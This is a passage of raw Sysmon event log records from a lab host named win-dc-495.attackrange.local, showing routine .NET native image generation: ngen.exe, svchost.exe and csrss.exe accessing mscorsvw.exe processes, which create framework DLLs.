13:50:34.649{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1278-0\System.Activities.Presentation.dll2021-01-18 13:50:34.649 10341000x80000000000000008290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.555{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.540{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.540{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0D04-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.462{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0D04-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.462{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0D04-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:35.415{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e4-0\System.AddIn.Contract.dll2021-01-18 13:50:35.415 10341000x80000000000000008283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.352{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.352{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0B04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.321{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0B04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.321{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0B04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:35.243{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dc-0\System.AddIn.dll2021-01-18 13:50:35.243 11241100x80000000000000008312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.993{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\124c-0\System.Data.DataSetExtensions.dll2021-01-18 13:50:36.993 10341000x80000000000000008311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.868{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.868{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.790{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1304-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.774{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1304-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.774{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1304-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.712{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\132c-0\System.ComponentModel.DataAnnotations.dll2021-01-18 13:50:36.712 10341000x80000000000000008304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.587{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.571{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.571{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1104-00000000A301}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 